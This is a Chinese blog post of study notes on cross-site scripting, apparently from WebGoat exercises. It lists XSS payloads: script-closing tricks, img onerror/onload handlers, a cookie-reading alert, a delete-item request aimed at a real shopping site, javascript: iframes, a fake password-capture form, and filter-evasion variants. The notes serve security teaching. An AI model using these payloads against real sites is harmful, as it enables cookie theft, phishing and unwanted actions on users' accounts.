Cross Cite Scripting

最新推荐文章于 2022-08-05 15:18:23 发布
最新推荐文章于 2022-08-05 15:18:23 发布
阅读量401 收藏
点赞数
分类专栏: WebGoat 文章标签: scripting javascript iframe html 框架 jsonp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fallinsky/article/details/5973804
版权

白盒状态下,检测源码中用户输入的地方和变量是否对长度和对”〈”,”〉”,”;”,”’”等字符进行过滤。

黑盒测试时,有时输入〈script〉alert(‘test’)〈/script〉,代码没有被执行的,因为在源代码里,可能有其它的标签未闭合,如少了一个〈/script〉,这个时候,只要闭合一个〈/script〉,代码就会执行,如:在标题处输入〈/script〉〈script〉alert(‘test’)〈/script〉,这样就可以弹出一个test的框。

 

html标签中 属性onerror和onload可以被用来自动加载构造的代码。

例如:

<img src=x οnerrοr=;;alert('XSS') />

或者

<img src="images/logos/owasp.jpg" οnlοad="JavaScript:alert('XSS')"/>

PS:img标签可以<img />代替标签对的作用。

再PS:Javascript可以用上述的形式调用,而不需要尖括号的标签对引入,WHY?

 

 

<img src=x οnerrοr=alert(document.cookie)>

或者 <img src=”http://www.paipai.com/delitem?itemid=232131312”>

 

 

再例:

在iframe标签中也可以实现攻击

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

 

Iframe是Inline Frame的缩写,称为内联框架(即嵌入式框架),它和frame如同兄弟。

frame是帧标记,Iframe叫浮动帧标记,它不同于Frame标记最大的特征即这个标记所引用的HTML文件不是与另外的HTML文件相互独立显示,而是可以直接嵌入在一个HTML文件中,与这个HTML文件内容相互融合,成为一个整体;因为它可以多次在一个页面内显示同一内容,而不必重复写内容。 

iframe可以很方便的在网页的任何地方,引入其他页相对<frame> 来说灵活很多,而且可以利用iframe中网页的javascript编程,还可以灵活的来控制iframe和parent之间的关系。

 

Iframe标记使用格式,如下:  
<Iframe src="yourframe.htm" width="700" height="100" scrolling="NO" frameborder="0" name="main"></iframe>  
其中的各个含义是: 
src: 文件的路径,既可是HTML文件,也可以是文本、ASP等; 
width、height:“内部框架”区域的宽与高; 
scrolling:当SRC的指定的HTML文件在指定的区域内显示不完时的滚动选项,如果设置为NO,则不出现滚动条;如为Auto:则自动出现滚动条;如为Yes,则显示滚动条。 
FrameBorder:区域边框的宽度,只有0和1两个值,分别表示没有边框和有边框,为了让“内部框架”与邻近的内容相融合,常设置为0。 
name:框架的名字,用来进行识别。

 

 

在要显示位置加入password输入框

Please enter your password:

<BR><input type = "password" name="pass"/><button onClick="javascript:alert('I have your password: ' + pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>

这么多BR标签的用处是增加许多新的行 使得呈现出来的页面将原有的输入框排到下方,而直接将构造出的新的password输入框呈现出来,欺骗用户进行输入。

PS:input控件的type属性置为password,用户输入时就看不到密码原文,以黑点代替!

 

 

以下内容则摘自

http://www.gracecode.com/archives/2491/

 

Javascript 代码注入

Javascript 代码注入主要表现为直接引用未经校验的字符串、解析不安全的 JSON 数据(包括 JSONP)等。

很多时候会写这样的代码

document.write('u name is' + name);

这就会形成一定的安全性问题(如果服务器端没有过滤的话),比如 name 为下面的数据,在没有经过过滤时

';alert('xss');//
";alert('xss');//
'';!--"<xss>=&{()}

就会破坏原有代码结构,插入不期望的代码。

HTML 标签注入

HTML 注入是较为常见的一种方式,主要的注入入口为不周全的正则过滤、内联样式(针对 Exploer),下面是常见的注入代码

逃过不周全的正则过滤,解决方案为使用 PHP 的 htmlspecialchars 以及 htmlentities 等类似函数转义。

<sCrIpT src=xss.js></sCrIpT>
<script src=xss.js>
</script>
<script/xss src="xss.js"></script>
<script/SRC="xss.js"></script>
<<script>alert("xss");//<</script>
<script>a=/xss/
alert(a.source)</script>

从图片标签中注入,在些论坛上比较常见

<img src="javascript:alert('xss');">
<img """><script>alert("xss")</script>">
<img src="xss.php?param">

从连接标签上注入(虽然本人没有发现过案例,不过也不能轻视)

<script a=">" SRC="xss.js"></script>
<script =">" SRC="xss.js"></script>
<script a=">" '' SRC="xss.js"></script>

其他容易注入的地方

<body οnlοad=alert('xss')>
<iframe src="javascript:alert('xss');"></iframe>
<embed src="xss.swf" AllowScriptAccess="always"></embed>
<meta http-equiv="Set-Cookie" content="USERID=<script>alert('xss')</script>">

 

fallinsky
关注
专栏目录
XSS基础原理(Cross-site scripting)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-13 1598
XSS基础原理(Cross-site scripting) 文章目录XSS基础原理(Cross-site scripting)什么是跨站脚本 (XSS)?XSS 攻击主要分为三种类反射型 XSS,其中恶意脚本来自当前的 HTTP 请求案例 1 大小写,双写绕过 dvwa_Medium案例 2 各种标签绕过 dvwa_high案例 3 htmlspecialchars pikachu_htmlspecialchars存储的 XSS,其中恶意脚本来自网站的数据库案例 1 replace()函数对尖括
SpringBoot2 学习笔记(四)——使用Jsoup防御XSS攻击
haliaddel的博客
12-15 637
什么是XSS攻击 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 使用Jsoup可以有效的过滤不安全的代码。Jsoup使用白名...
DVWA V1.9:Reflected Cross Site Scripting(反射型XSS)
qq_43233085的博客
01-27 568
DVWA V1.9:Reflected Cross Site Scripting(反射型XSS)反射型 XSS 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 反射型 XSS 介绍 “跨站点脚本(XSS)”攻击是一种注入问题,其中恶意脚本被注入到其他良性的和可信的网站中。 当攻击者使...
Cross-site Scripting (XSS)
weixin_30325487的博客
01-10 2535
<!-- Project Name : Cross Site Scripting ( XSS ) Vulnerability Payload List --> <!-- Author : Ismail Tasdelen --> <!-- Linkedin : https://www.linkedin.com/in/ismailtasdel...
springboot xss
tanxuefeng11的专栏
08-05 3174
springboot xss
BI市场象限(转载)
wujiandao的专栏
03-24 8128
Magic Quadrant for Business Intelligence Platforms 6 February 2012 ID:G00225500 Analyst(s): John Hagerty, Rita L. Sallam, James Richardson VIEW SUMMARY In 2011, business
XSS
ChanCherry的博客
07-28 156
XSS 跨站脚本攻击(Cross Cite Scripting),它是通过对网页注入可执行代码(通常是JavaScript代码)且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击。一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,黑客可以利用xss盗取用户的cookie,有了用户的cookie,可以以用户的身份来正常访问站点。有时候还和其他...
java 富文本 xss_个人网站对xss跨站脚本攻击(重点是富文本编辑器情况)和sql注入攻击的防范...
weixin_39664010的博客
02-16 1198
昨天本博客受到了xss跨站脚本注入攻击,3分钟攻陷……其实攻击者进攻的手法很简单,没啥技术含量。只能感叹自己之前竟然完全没防范。这是数据库里留下的一些记录。最后那人弄了一个无限循环弹出框的脚本,估计这个脚本之后他再想输入也没法了。类似这种:我立刻认识到这事件严重性,它说明我的博客有严重安全问题。因为xss跨站脚本攻击可能导致用户Cookie甚至服务器Session用户信息被劫持,后果严重。虽然攻击...
前端安全: 如何防止 XSS 攻击?
学习真香
06-27 4177
前端安全: 如何防止 XSS 攻击? 分享简介 今天想分享给大家的是 如何防止 XSS 攻击. 为什么想分享的原因是: 感觉大家对前端安全了解不够, 重视不够. 内容是: 什么是 xss, 常见 xss 的类型. 并且通过小游戏来实践. 如何去防止 xss 攻击 如何利用 XSS 进行攻击 什么是 XSS 攻击 Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信
cite space 5.5.R2.7z安装包
11-13
CiteSpace 5.5.R2安装指南与应用解析》 CiteSpace是一款强大的文献可视化分析工具,尤其在学术领域被广泛使用。其最新版本为5.5.R2,这个压缩包包含了运行CiteSpace所需的核心文件。下面将详细介绍CiteSpace的...
geoserver-cite-tools:针对 GeoServer 运行 OGC CITE 测试的工具
06-15
GeoServer CITE 工具 要求 混帐 行家 蚂蚁 构建工具 克隆geoserver-cite-tools存储库: % git clone git://github.com/jdeolive/geoserver-cite-tools.git 更新/初始化子模块: % git submodule update --init ...
Citationsy - Cite Websites and P-1.2.4.zip
最新发布
12-29
名称:Citationsy - Cite Websites and P -------------------- 版本:1.2.4 作者:https://citationsy.com 分类:网页增强 -------------------- 概述:由 Citationsy 提供支持,只需单击一下即可参考网站和论文。 ...
HTTP Response Splitting攻击探究
10-27 4024
学习WebGoat第一章General第一小节:HTTP Basics:使用Proxy软件(例如Webscarab)来截断浏览器(客户端)和Server之间的HTTP通信,之后任意篡改得到预期结果即可。第二小节:HTTP Splitting:(其实应该为HTTP Response Splitting)分为两步——1、HTTP Splitting;2、Cache PoisoningHTTP Response Splitting介绍:“HTTP Response Splitting” is a new appl
从Basic Authentication认知cookie和session
11-18 1614
HTTP Basic Authentication查看wikipedia的解释,http://en.wikipedia.org/wiki/Basic_authentication_schemeHTTP Basic Authentication即Basic access authentication概念:In the context of an HTTP transaction, the basic access authentication is a method designed to allow a w
Forgot Password
11-17 636
<br />Web applications frequently provide their users the ability to retrieve a forgotten password. Unfortunately, many web applications fail to implement the mechanism properly. The information required to verify the identity of the user is often overly s
Silent Transactions Attacks
11-16 549
<br /><br />How the attacks works:<br />Any system that silently processes transactions using a single submission is dangerous to the client. <br />For example, if a normal web application allows a simple URL submission, a preset session attack will allow
Insecure Client Storage
11-17 428
<br />学习完最大的收获是学会了怎样用firebug调试js脚本,十分强大^_^<br /> <br />It is always a good practice to validate all input on the server side. Leaving the mechanism for validation on the client side leaves it vulnerable to reverse engineering. Remember, anything on the cli
Code Quality
11-18 325
<br />一些程序员在编程时会因各种原因在源码中留下诸如FIXME's, TODO's, Code Broken, Hack等注释,这些注释信息可能会在某些情况下暴漏在用户眼前。如web应用,查看页面source就有可能从中发现敏感信息,从而达到认证绕过,造成信息泄露!<br /> <br />攻击时可以查看在源文件中搜索注释信息中的passwords, backdoors或者something doesn't work right这些字样,还可以搜索hidden,FIXME's, TODO's,或者注释
xpath cite
09-19
XPath是一种用于在XML文档中定位元素的语言。它使用路径表达式来选择XML文档中的节点或节点集合。在XPath中,cite是一个元素节点名或标签名。要使用XPath选择cite元素...//div/cite:选择所有父元素为div的cite元素节点
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值